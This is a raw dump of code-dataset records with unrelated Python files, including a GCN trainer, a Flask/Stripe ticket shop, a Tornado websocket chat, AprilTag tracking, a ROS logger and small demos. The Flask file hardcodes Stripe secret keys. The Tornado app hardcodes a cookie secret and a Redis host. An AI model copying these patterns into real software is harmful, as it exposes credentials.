# Print results\r\n print(\"Epoch:\", '%04d' % (epoch + 1), \"train_loss=\", \"{:.5f}\".format(outs[1]),\r\n \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost),\r\n \"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() - t))\r\n\r\n if acc > best_val:\r\n best_val = acc \r\n model.save(best_model_path+'/best_model', sess)\r\n\r\n if epoch > configs['early_stopping'] and cost_val[-1] > np.mean(cost_val[-(configs['early_stopping']+1):-1]):\r\n print(\"Early stopping...\")\r\n break\r\n\r\nprint(\"Optimization Finished!\")\r\n\r\n# Testing\r\ntf.reset_default_graph()\r\nmodel.load(best_model_path + '/best_model', sess)\r\n\r\ntest_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, placeholders)\r\nprint(\"Test set results:\", \"cost=\", \"{:.5f}\".format(test_cost),\r\n \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration))\r\n","sub_path":"gcn/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"150291857","text":"from flask import Flask, render_template, request, redirect, url_for, session\nfrom backend.ticket_manager import TicketClass\nfrom backend.simplegmail_wrapper import GreetingEmail\n\nimport stripe\n\napp = Flask(__name__)\n\n# Adding STRIPE tokens to the app configuration\napp.config['STRIPE_PUBLIC_KEY'] = 'pk_test_1CPqKqHEMYPL3pep8bzUadZQ'\napp.config['STRIPE_SECRET_KEY'] = 'sk_test_2dqyTdYE3bmQbslK8JQg3X9D'\n\n# Setting up the STRIPE API key\nstripe.api_key = app.config['STRIPE_SECRET_KEY']\n\n# Route for the ticket purchasing page\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n # Getting the number of tickets remaining to be sold\n tickets_remaining = TicketClass.MAX_LIMIT_TICKETS - TicketClass.getNumSoldTickets()\n\n # Returning an error message if all the tickets have been sold\n if (tickets_remaining == 0):\n return render_template('/tickets/buy-tickets.html', error=\"NoTickets\", tickets_remaining=tickets_remaining)\n\n session = stripe.checkout.Session.create(\n payment_method_types=['card'],\n line_items=[{\n 'price': 'price_1Ixv2UDTPk3QaJIM1e6YzLrw',\n 'quantity': 1,\n }],\n mode='payment',\n success_url=url_for('success', _external=True) + '?session_id={CHECKOUT_SESSION_ID}',\n cancel_url=url_for('index', _external=True) + '?error=Fail',\n )\n\n return render_template('/tickets/buy-tickets.html',\n checkout_session_id=session['id'],\n checkout_public_key=app.config['STRIPE_PUBLIC_KEY'],\n tickets_remaining=tickets_remaining\n )\n\n@app.route('/success', methods=['GET'])\ndef success():\n # Purchase was successful\n session_info = stripe.checkout.Session.retrieve(request.args.get('session_id'))\n customer = stripe.Customer.retrieve(session_info.customer)\n\n # Parsing the customer's information\n fullname = customer.name\n customer_email = customer.email\n \n if (len(fullname.split(\" \")) > 1):\n forename, surname = fullname.split(\" \")[0], fullname.split(\" \")[1]\n else:\n forename, surname = fullname, \"\"\n\n # Checking to see if the user has refreshed the page\n if (request.args.get('session_id') == TicketClass.LAST_SESSION_ID):\n return render_template('/tickets/success.html', name=\"\", qr_code=\"\", refresh=True)\n\n # Creating a new QR code for the user's ticket\n qr_code = TicketClass.createQRCode(\"127.0.0.1:5000/verify?id=\", (forename, surname))\n # Setting the last session id to the current id\n 
TicketClass.LAST_SESSION_ID = request.args.get('session_id')\n\n # Creating a confirmation email containing the customer's ticket\n email = GreetingEmail(forename, surname, customer_email, qr_code[len(\"data:image/png;base64,\")-1:])\n # Sending the confirmation email\n email.send()\n \n return render_template('/tickets/success.html', name=fullname, qr_code=qr_code)\n\n@app.route('/verify')\ndef verification_page():\n # Verifying the identity of the ticket\n allow, name = TicketClass.verify_ticket(request.args.get('id'))\n\n if (allow):\n fullname = name[0] + \" \" + name[1]\n # Updating the ticket to be 'checked-in'\n TicketClass.setCheckedIn(request.args.get('id'))\n return render_template('/verify/verification.html', name=fullname)\n\n return render_template('/verify/verification.html', name=\"Fail\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"246125380","text":"import numpy as np\n\nfrom abraxus.population import Individual, Population, SeedChromosome\n\n\ndef test_create_seed_chromosome():\n ch = SeedChromosome()\n value = ch.value()\n assert value != ch.mutate()\n\n\ndef test_create_individual():\n ind = Individual([SeedChromosome])\n assert ind.chromosomes.get(\"seed\")\n assert not ind.chromosomes.get(\"evaluate\")\n assert isinstance(ind.chromosomes[\"seed\"], SeedChromosome)\n\n\ndef test_create_population():\n population = Population(max_size=100, mutation=0.5, cross=0.4)\n assert population._max_size == 100\n assert population._mutation == 0.5\n assert population._cross == 0.4\n\n\ndef test_init_population():\n population = Population(max_size=100, mutation=0.5, cross=0.4)\n population.initial([SeedChromosome])\n assert len(population.pool) == 20\n assert isinstance(population.pool[0], Individual)\n for ind in population.pool:\n print(ind.dna)\n\n\ndef objective_func(individual: Individual):\n \"\"\"\n Целевая функция для работы генетического алгоритма.\n Должна получать параметры из \"особи\" проводить вычисления\n и возвращать значение ошибки\n :param individual:\n :return:\n \"\"\"\n seed = individual.seed\n np.random.seed(seed)\n array = []\n for i in range(15):\n array.append(np.random.uniform(0, 1))\n result = sum(array)\n error = (1 - result) ** 2\n return error\n\n\ndef test_calculate_population():\n population = Population(max_size=100, mutation=0.5, cross=0.4)\n population.initial([SeedChromosome])\n population.calculate(objective_func)\n assert len(population.errors_generation) == 20\n for i, error in enumerate(population.errors_generation):\n print(i, error)\n\n\ndef test_evaluate_population():\n population = Population(max_size=100, mutation=0.5, cross=0.4)\n population.initial([SeedChromosome])\n population.calculate(objective_func)\n population.evaluate()\n assert len(population.errors_generation) == 20\n e = 0\n for i, error in enumerate(population.errors_generation):\n assert error[1] >= e\n e = error[1]\n print(i, error)\n\n\ndef test_cross_population():\n population = Population(max_size=100, mutation=0.5, cross=0.4)\n population.initial([SeedChromosome])\n population.calculate(objective_func)\n population.evaluate()\n population.cross()\n\n assert len(population.errors_generation) == 20\n e = 0\n for i, error in enumerate(population.errors_generation):\n assert error[1] >= e\n e = error[1]\n print(i, 
error)\n","sub_path":"abraxus/tests/test_population.py","file_name":"test_population.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"298523510","text":"import re\n\n# I или ignorecase — поиск без учета регистра:\n\np = re.compile(r\"^[а-яе]+$\", re.U) \nprint(\"Найдено\" if p.search(\"абв\") else \"Нет\") # Поиск по регистру\n\np = re.compile(r\"^[а-яе]+$\", re.I | re.U) \nprint(\"Найдено\" if p.search(\"АБагд\") else \"Нет\") # Поиск по регистру\n\n# Символ ^ соответствует привязке к началу каждой подстроки;\n# Cимвол $ — позициия перед символом перевода строки;\n\nc = re.compile(r\"\"\"^# Привязка к началу строки\n[0-9]+ #Строка должна содержать одну цифру (или более)\n$ # Привязка к концу строки \n\"\"\", re.X| re.S)\nprint(\"Найдено\" if c.search(\"124245021\") else \"Нет\") # Найдено\n\n","sub_path":"test22.py","file_name":"test22.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"431743299","text":"#!/usr/bin/env python3\n\nnums = list(map(int, input().split()))\n\ndef count(n):\n n_childs = nums[n]\n n_metadata = nums[n+1]\n pos = n+2\n res = 0\n for _ in range(n_childs):\n r, pos = count(pos)\n res += r \n for _ in range(n_metadata):\n res += nums[pos]\n pos += 1\n return res, pos\n\nprint(count(0)[0])","sub_path":"8/solution-A.py","file_name":"solution-A.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"266533343","text":"from pprint import pprint, pformat\n\n\nclass Field:\n def __init__(self, n, m):\n self.n, self.m = n, m\n\n if (type(n) is not int) or (type(m) is not int):\n raise Exception('Wrong type of field sizes: {} and {}'.format(type(n), type(m)))\n\n if n <= 0 or m <= 0:\n raise Exception('Wrong field size: {}x{}'.format(n, m))\n\n self.field = [[False for x in range(0, m)] for y in range(0, n)]\n\n def inside_field(self, x, y):\n return (x in range(0, self.n)) and (y in range(0, self.m))\n\n def set_cell(self, x, y, is_alive):\n if not self.inside_field(x, y):\n raise Exception('Cell {}x{} is outside the field of size {}x{}'.format(x, y, self.n, self.m))\n\n if is_alive not in [True, False]:\n raise Exception('is_alive should be True or False but it is {}'.format(is_alive))\n\n self.field[x][y] = is_alive\n\n def get_cell(self, x, y):\n if not self.inside_field(x, y):\n return False\n return self.field[x][y]\n\n\nif __name__ == '__main__':\n pass","sub_path":"life.py","file_name":"life.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"278119529","text":"# Time Lapse Photography\n# Ryan Heitz\n# Take a photo at a set interval\n\nimport time\nimport picamera\n\nwith picamera.PiCamera() as camera:\n camera.start_preview()\n time.sleep(2)\n # Start taking pictures repeatedly\n for filename in camera.capture_continuous('image{counter:04d}.jpg'):\n print('Captured %s' % filename)\n # wait 3 minutes\n time.sleep(180) \n","sub_path":"appendixD/TimeLapse.py","file_name":"TimeLapse.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"541559308","text":"import pyrealsense2 as rs\nimport cv2\nimport numpy as np\nimport time\nfrom pupil_apriltags import Detector\nimport matplotlib.pyplot as 
plt\n\nfrom transforms3d.euler import mat2euler\nimport json\n\n\ndef test():\n \n at_detector = Detector(\n families=\"tag36h11\",\n nthreads=1,\n quad_decimate=1.0,\n quad_sigma=0.0,\n refine_edges=1,\n decode_sharpening=0.5,\n debug=0,\n )\n\n camera_params = [425.40704345703125, 425.40704345703125, 421.0938720703125, 246.84486389160156]\n tag_size = 0.030\n\n centers = []\n angles = []\n\n for i in range(200):\n image = cv2.imread(f\"/scratch/azimov/igor/data/physics/tmp/{i:04d}.png\", 0)\n \n tags = at_detector.detect(\n image,\n estimate_tag_pose=True,\n camera_params=camera_params,\n tag_size=tag_size,\n )\n\n if len(tags) == 1:\n centers.append(tags[0].pose_t)\n euler = mat2euler(tags[0].pose_R)\n print(euler)\n angles.append(euler[2])\n\n # print(tags)\n\n print(f\"{i:04d} / {200:04d}: {len(tags)}\")\n\n for i in range(1, len(angles)):\n a0 = angles[i-1]\n a1 = angles[i]\n if a0 - a1 > 270-30:\n angles[i] += 270 \n elif a0 - a1 > 180-30:\n angles[i] += 180 \n elif a0 - a1 > 90-30:\n angles[i] += 90\n elif a1 - a0 > 270-30:\n angles[i] -= 270 \n elif a1 - a0 > 180-30:\n angles[i] -= 180 \n elif a1 - a0 > 90-30:\n angles[i] -= 90\n\n times = [i / 90.0 for i in range(len(centers))] # assumed 90 fps; one timestamp per detected frame\n\n\n plt.figure()\n plt.subplot(2, 1, 1)\n plt.plot(times, [c[0] for c in centers], '-o', label=\"x\")\n plt.plot(times, [c[1] for c in centers], '-o', label=\"y\")\n # plt.plot([c[2] for c in centers], '-*', label=\"z\")\n plt.legend()\n\n plt.subplot(2, 1, 2)\n plt.plot(times, angles, '-o', label=\"angle\")\n plt.legend()\n\n plt.show()\n\n # ndarrays are not JSON serializable, so convert each pose vector to a plain list\n data = dict(time=times, center=[c.flatten().tolist() for c in centers], angle=np.rad2deg(angles).tolist())\n json_name = \"tags.json\" # NOTE: assumed output filename\n with open(json_name, 'w') as f:\n json.dump(data, f)\n\n\nif __name__ == \"__main__\":\n test()\n","sub_path":"experimental_physics/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"648737712","text":"from random import randint\r\nimport random\r\nfrom numpy import diff\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nnumofruns=0\r\nruns=[]\r\nsum=0\r\ntotalit=[]\r\np=0\r\n\r\nfor i in range (500):\r\n a=[[0 for i in range(150)] for j in range(100)]\r\n b=[[0 for i in range(150)] for j in range(100)]\r\n a[50][75]=1\r\n iterations=0\r\n numofones=0\r\n\r\n plot1x=[]\r\n plot1y=[]\r\n\r\n while(numofones!=15000):\r\n list1=[]\r\n while(len(list1)!=8):\r\n a1= randint(0,99)\r\n b1= randint(0,149)\r\n if [a1,b1] not in list1:\r\n list1.append([a1,b1])\r\n list2=[]\r\n while(len(list2)!=8):\r\n c1=randint(0,99)\r\n d1=randint(0,149)\r\n if [c1,d1] not in list1 and [c1,d1] not in list2:\r\n list2.append([c1,d1])\r\n\r\n for x in range (8):\r\n temp=a[(list1[x][0])][(list1[x][1])]\r\n a[(list1[x][0])][(list1[x][1])]=a[(list2[x][0])][(list2[x][1])]\r\n a[(list2[x][0])][(list2[x][1])]=temp\r\n\r\n for i in range (100):\r\n for j in range (150):\r\n if a[i][j]==1:\r\n for u in range (i-1,i+2):\r\n for v in range (j-1,j+2):\r\n if u>=0 and v>=0:\r\n u=u%100\r\n v=v%150\r\n if random.random() <= 0.25:\r\n b[u][v]=1\r\n\r\n for u in range (i-2,i+3):\r\n for v in range (j-2,j+3):\r\n if u>=0 and v>=0 and (u==i or u==i+2 or v==j or v==j+2):\r\n u=u%100\r\n v=v%150\r\n if random.random() <= 0.08 :\r\n b[u][v]=1\r\n\r\n for i in range (100):\r\n for j in range (150):\r\n if b[i][j]==1:\r\n a[i][j]=1\r\n\r\n numofones=0\r\n iterations+=1\r\n for i in a:\r\n for j in i:\r\n if j==1:\r\n numofones=numofones+1\r\n 
plot1x.append(iterations)\r\n plot1y.append(numofones)\r\n if p==0:\r\n plt.plot(plot1x, plot1y)\r\n plt.show()\r\n dy = diff(plot1y)\r\n dx = diff(plot1x)\r\n dydx = [i / j for i, j in zip(dy, dx)]\r\n dydx.append(0)\r\n plt.figure()\r\n poly = np.polyfit(plot1x, dydx, 20)\r\n poly_y = np.poly1d(poly)(plot1x)\r\n\r\n plt.plot(plot1x, dydx, color='black')\r\n plt.plot(plot1x, poly_y, color='red')\r\n plt.show()\r\n\r\n numofruns = numofruns + 1\r\n p = 10\r\n sum=sum+iterations\r\n runs.append(numofruns)\r\n totalit.append(iterations)\r\n\r\navg = sum / 500\r\nprint('The average number of iterations for 500 runs are', avg)\r\nplt.plot(runs, totalit)\r\nplt.show()\r\n","sub_path":"Submission/Assignment-2/SoC-assign2-code-DK.py","file_name":"SoC-assign2-code-DK.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"244442704","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Author: Yuki Furuta \n\nimport rospy\nfrom mongodb_store.message_store import MessageStoreProxy\n\n\nclass LoggerBase(object):\n def __init__(self, db_name='jsk_robot_lifelog', col_name=None):\n super(LoggerBase, self).__init__()\n self.db_name = rospy.get_param('/robot/database','jsk_robot_lifelog')\n try:\n if col_name is None:\n self.col_name = rospy.get_param('/robot/name')\n else:\n self.col_name = col_name\n except KeyError as e:\n rospy.logerr(\"please specify param \\\"/robot/name\\\" (e.g. pr1012, olive)\")\n exit(1)\n\n self.task_id = None\n\n self.msg_store = MessageStoreProxy(database=self.db_name, collection=self.col_name)\n rospy.loginfo(\"connected to %s.%s\" % (self.db_name, self.col_name))\n\n def insert(self, msg, meta={}, wait=False):\n if self.task_id is not None:\n meta.update({ \"task_id\": self.task_id })\n return self.msg_store.insert(msg, meta, wait=wait)\n\n def spinOnce(self):\n self.task_id = rospy.get_param(\"/task_id\", None)\n\n","sub_path":"jsk_robot_common/jsk_robot_startup/src/jsk_robot_startup/lifelog/logger_base.py","file_name":"logger_base.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"537783516","text":"# -*- coding: utf-8 -*-\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nfrom tornado.options import define, options\nimport json\nimport time\nimport tornado.websocket\n\nimport utils.uimethod\nimport utils.uimodules\nfrom data.user_modules import User, session\nfrom tornado.web import authenticated\nfrom pycket.session import SessionMixin\nimport datetime\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\ndefine(name='port', default=8000, help='run port', type=int)\n\n\nclass BaseHandler(tornado.web.RequestHandler, SessionMixin):\n def get_current_user(self):\n # current_user = self.get_secure_cookie('ID')\n current_user = self.session.get('user')\n if current_user:\n return current_user\n return None\n\n\nclass BaseWebSocketHandler(tornado.websocket.WebSocketHandler, SessionMixin):\n def get_current_user(self):\n current_user = self.session.get('user')\n if current_user:\n return current_user\n return None\n\n\nclass IndexHandler(BaseHandler):\n @authenticated\n def get(self):\n # self.write('
index---【已登录】
退出登录')\n self.render('11websocket_new.html')\n\n\nclass MessageWSHandler(BaseWebSocketHandler):\n users = set()\n\n def open(self):\n MessageWSHandler.users.add(self)\n print('---open---')\n\n def on_message(self, message):\n print(message, self.current_user)\n for u in self.users:\n u.write_message('%s-%s-说:%s' % (self.current_user, datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'), message))\n\n def on_close(self):\n if self in MessageWSHandler.users:\n MessageWSHandler.users.remove(self)\n print(MessageWSHandler.users)\n print('---close---')\n\n\nclass CookieLoginHandler(BaseHandler):\n def get(self):\n next_name = self.get_argument('next', '')\n self.render('10auth.html', error=None, next_name=next_name)\n\n def post(self):\n next_name = self.get_argument('next', '')\n username = User.by_name(self.get_argument('name', ''))\n pwd = self.get_argument('password', '')\n if username and username[0].password == pwd:\n # self.set_secure_cookie(name='ID', value=username[0].username, max_age=120)\n self.session.set('user', username[0].username)\n time.sleep(1)\n if next_name:\n self.redirect(next_name)\n else:\n self.redirect('/index')\n else:\n self.render('10auth.html', error='登录失败...请重新登录!', next_name=next_name)\n\n\nclass LogoutHandler(BaseHandler):\n def get(self):\n self.clear_all_cookies()\n self.redirect('/index')\n\n\nclass SyncHandler(BaseHandler):\n def get(self):\n time.sleep(10)\n id = self.get_argument('id', 13)\n user1 = User.by_id(id)\n user = {\n 'username': user1[0].username,\n 'userid': user1[0].id\n }\n self.write(user)\n\n\nif __name__ == '__main__':\n tornado.options.parse_command_line()\n app = tornado.web.Application(\n handlers=[\n (r'/index', IndexHandler),\n (r'/cookie_login', CookieLoginHandler),\n (r'/logout', LogoutHandler),\n (r'/websocket', MessageWSHandler),\n (r'/sync', SyncHandler),\n ],\n template_path='templates',\n # autoescape=None,\n static_path='static',\n ui_modules=utils.uimodules,\n ui_methods=utils.uimethod,\n cookie_secret='aasdasdasfgdfsdfsdfsdf',\n login_url='/cookie_login',\n pycket={\n 'engine': 'redis',\n 'storage': {\n 'host': '106.14.212.108',\n 'port': 6379,\n 'db_sessions': 5,\n 'db_notifications': 11,\n 'max_connections': 2**31,\n },\n 'cookies': {\n 'expires_days': 30,\n 'max_age': 600\n },\n },\n debug=True,\n )\n http_server = tornado.httpserver.HTTPServer(app)\n http_server.listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n","sub_path":"13asynchronous.py","file_name":"13asynchronous.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"450232978","text":"#!/usr/bin/env python\n\"\"\" Furniture class\"\"\"\nfrom inventory_management.inventory_class import Inventory\n\n\nclass Furniture(Inventory):\n \"\"\" Furniture class\"\"\"\n def __init__(self: Inventory,\n product_code: str,\n description: str,\n market_price: float,\n rental_price: float,\n material=\"\",\n size=\"\"):\n \"\"\"\n Creates common instance variables from the parent class\n :rtype: Furniture\n \"\"\"\n\n super().__init__(product_code, description, market_price, rental_price)\n\n self.material = material\n self.size = size\n","sub_path":"students/tim_lurvey/lesson01/Assignment/inventory_management/furniture_class.py","file_name":"furniture_class.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"452329348","text":"import os\nimport webapp2\nimport 
jinja2\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\nclass Chloe(webapp2.RequestHandler):\n def get(self):\n\n template_values = {\n 'client': 'Chloe',\n 'photos': 41,\n 'title': 'Gallerie de Chloe (Meyzou photographie)'\n }\n\n template = JINJA_ENVIRONMENT.get_template('static_website/chloe.html')\n self.response.write(template.render(template_values))\n\nclass MainPage(webapp2.RequestHandler):\n def get(self):\n\n template_values = {}\n\n template = JINJA_ENVIRONMENT.get_template('static_website/index.html')\n self.response.write(template.render(template_values))\n\napplication = webapp2.WSGIApplication([\n ('/', MainPage),\n ('/chloe', Chloe),\n], debug=True)\n","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"19916614","text":"from pyspark.mllib.feature import HashingTF\nfrom pyspark.mllib.regression import LabeledPoint\n\nfrom utils import Utils\n\nclass Document:\n \n\tdicIdf = {}\n\tfileName = '/home/manh/Documents/git/manhdoi/reishi_batch/output/idf_hash.txt'\n\tfile = open(fileName, 'r')\n \n\tfor line in file:\n\t\tsplit = line.split(' ')\n\t\tif split[1].rstrip('\\n') in dicIdf:\n\t\t\tcontinue\n\t\tdicIdf[split[1].rstrip('\\n')] = split[0]\n\tfile.close()\n \n\tutils = Utils(15000)\n \n\tdef __init__(self, id, content, timestamps):\n\t\tself.id = id\n\t\tself.class_id = ''\n\t\tself.cluster_id = ''\n\t\tself.content = content\n\t\tself.vector = ''\n\t\tself.timestamps = timestamps\n\t\t\n\tdef doc2vec(self):\n\t\tcontentSplit = self.content.split()\n\t\tcontentHash = {}\n\t\tcontentResult = ''\n\t\tfor w in contentSplit:\n\t\t\thash = Document.utils.createHashing(w)\n\t\t\tif hash != -1:\n\t\t\t\tif(hash in contentHash) == False:\n\t\t\t\t\tcontentHash[hash] = 1\n\t\t\t\telse:\n\t\t\t\t\tcontentHash[hash] = contentHash[hash] + 1\n\t\tsortedKey = sorted(contentHash.keys())\n\t\tfor k in sortedKey:\n\t\t\tif(str(k) in Document.dicIdf) == True:\n\t\t\t\tself.vector = '%s;%d %.4f' % (self.vector, k, float(contentHash[k]) * float(Document.dicIdf[str(k)]))\n\t\tself.vector = self.vector[+1:]\n \n\tdef printVec(self):\n\t\tprint(self.vector)\n \nclass DocumentKmeans(Document):\n\t\n\tdef __init__(self, id, vector, timestamps):\n\t\tself.id = id\n\t\tself.vector = vector\n\t\tself.cluster_id = ''\n\t\tself.timestamps = timestamps\n\t\n\tdef kmeansVec(self):\n\t\tself.parsedData = [0 for i in range(Utils.numOfWord)]\n\t\tvecSplit = self.vector.split(';')\n\t\tif len(vecSplit) > 0:\n\t\t\tfor vs in vecSplit:\n\t\t\t\tif len(vs) > 0:\n\t\t\t\t\tvSplit = vs.split()\n\t\t\t\t\tself.parsedData[int(vSplit[0])] = float(vSplit[1])\n\t\t\t\t\t\n\tdef toString(self):\n\t\tresult = ''\n\t\tfor v in self.parsedData:\n\t\t\tresult = result + str(v) + ' '\n\t\treturn result\n\t\t \nclass DocumentSVM(Document):\n\tdef __init__(self, label, vector):\n\t\tself.label = label\n\t\tself.vector = vector\n\t\tself.id = ''\n\t\tself.class_id = ''\n\t\tself.timestamps = None\n \n\tdef svmVec(self):\n\t\tself.parsedData = [0 for i in range(Utils.numOfWord)]\n\t\tsplits = self.vector.split(';')\n\t\tif len(splits) > 0:\t\t\n\t\t\tfor vs in splits:\n\t\t\t\tif len(vs) > 0:\n\t\t\t\t\tvSplit = vs.split()\n\t\t\t\t\tself.parsedData[int(vSplit[0])] = float(vSplit[1])\n\t\treturn LabeledPoint(float(self.label), self.parsedData)\n \n\tdef 
printDoc(self):\n\t\tprint('%s:%s\\n' % (self.id, self.class_id))\n","sub_path":"reishi_batch/src/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"500083950","text":"from tkinter import Tk\r\nfrom tkinter.messagebox import showwarning\r\nfrom time import sleep\r\n\r\n#from tkintertkMessageBox import showwarning\r\n\r\nimport win32com.client as win32\r\n#https://github.com/mhammond/pywin32/releases\r\n#download and execute as admin\r\n\r\nwarn = lambda app: showwarning(app, 'Exit?')\r\nRANGE = range(3, 8)\r\n\r\ndef excel():\r\n app = 'Excel'\r\n x1 = win32.gencache.EnsureDispatch('%s.Application' %app)\r\n ss = x1.Workbooks.Add()\r\n sh = ss.ActiveSheet\r\n x1.Visible = True\r\n sleep(1)\r\n\r\n sh.Cells(1, 1).Value = 'Python-to-%s Demo ' %app\r\n sleep(1)\r\n for i in RANGE:\r\n sh.Cells(i, 1).Value = 'Line %d' % i\r\n sh.Cells(i+2, 1).Value = \"Th-th-th-that's all folks!\"\r\n\r\n warn(app)\r\n ss.Close(False)\r\n x1.Application.Quit()\r\n\r\nif __name__ =='__main__':\r\n Tk().withdraw()\r\n excel()\r\n","sub_path":"Chat7/excel.pyw","file_name":"excel.pyw","file_ext":"pyw","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"336279481","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport sublime, sublime_plugin\r\nimport os\r\nimport sys\r\n\r\nclass PhpFormatterCommand(sublime_plugin.TextCommand):\r\n def run(self, edit):\r\n reload(sys)\r\n sys.setdefaultencoding(\"utf-8\")\r\n # projectパスの取り方はこれでいいのか?\r\n #projectDir = self.view.window().folders()[0]\r\n\r\n pluginPath = sublime.packages_path() + \"\\\\User\\\\php_formatter\\\\\"\r\n tempPath = os.environ.get('TEMP', '')\r\n if tempPath == \"\":\r\n sublime.message_dialog(u\"環境変数[TEMP]が取得できません。\")\r\n return\r\n\r\n #print(self.view.file_name())\r\n phpCBPath = pluginPath + \"phpCB.bat\"\r\n #phpCBPath = pluginPath + \"hoge.bat\"\r\n # 半角スペースを含むのでダブルコーテーションで囲む\r\n phpCBPath = '\"' + phpCBPath + '\"'\r\n phpCBPath = phpCBPath + \" \" + self.view.file_name()\r\n print(phpCBPath)\r\n os.system(phpCBPath)\r\n\r\n # 1次ファイルパス\r\n tempFilePath = tempPath + \"\\\\phpcb.php\"\r\n source = open(tempFilePath).read()\r\n\r\n regionAll = sublime.Region(0, self.view.size())\r\n self.view.replace(edit, regionAll, source)\r\n # self.view.replace(edit, regionAll, source)\r\n\r\n # sublime.packages_path() + \"User\\php_formater.bat\"\r\n #print(sublime.packages_path())\r\n\r\n # 再描画\r\n # self._force_refresh()\r\n\r\n","sub_path":"php_formatter.py","file_name":"php_formatter.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"31802346","text":"from gi.repository import Gtk\nfrom gi.repository import Granite\n\nclass HideEntryWindow(Gtk.Window):\n\n\tdef __init__(self):\n\t\tGtk.Window.__init__(self, title=\"HintedEntry Demo\")\n\t\tself.set_border_width(10)\n\n\t\thbox = Gtk.Box(spacing=6)\n\t\tself.add(hbox)\n\n\t\ttestbutton = Gtk.Button(\"This is a test\")\n\t\thbox.pack_start(testbutton, True, True, 0)\n\n\t\thintedentry = Granite.WidgetsHintedEntry()\n\t\thbox.pack_start(hintedentry, True, True, 0)\n\n\t\tdef onChanged(self):\n\t\t\tprint(hintedentry.get_text())\n\n\t\thintedentry.connect(\"changed\", onChanged)\n\t\t### XXX not working?\n\t\thintedentry.set_has_clear_icon(0)\n\t\thintedentry.set_hint_string(\"This is a 
hint.\")\n\nwin = HideEntryWindow()\nwin.connect(\"delete-event\", Gtk.main_quit)\nwin.show_all()\nGtk.main()\n","sub_path":"hintedentry.py","file_name":"hintedentry.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"586027486","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom multiprocessing.connection import Client\n\n\nclass RpcProxy:\n def __init__(self, connection):\n self._connection = connection\n\n def __getattr__(self, item):\n def rpc(*args, **kwargs):\n self._connection.send((item, args, kwargs))\n result = self._connection.recv()\n if isinstance(result, Exception):\n raise result\n return result\n\n return rpc\n\n\nc = Client(('localhost', 17000), authkey=b'peekaboo')\nproxy = RpcProxy(c)\nr = proxy.test(2, 3)\nprint(r)\n","sub_path":"python_cook_book/p_11/p_11_15.py","file_name":"p_11_15.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"572247548","text":"from bingen_hydroforecast_realtime_files_lib import RealtimeFilesMethods\nfrom def_system import FolderDefinition, BinDefinition, Debug\nfrom bingen_interface import BinGenInterface\nfrom bin_lib import BinaryLibrary, H5FileReader\nimport numpy as np\nimport shutil\nimport pickle\nimport time\nimport h5py\nimport sys\nimport os\n\ndebug_level_arg = 3\n\n# ####################################################### ARGS ####################################################### #\n\nmodel_id_arg = BinGenInterface.get_model_id(sys.argv) # useless step\ntimestamp_arg = BinGenInterface.get_timestamp(sys.argv)\nrunset_id_arg = BinGenInterface.get_runset_id(sys.argv)\n\n\n# ####################################################### DEFS ####################################################### 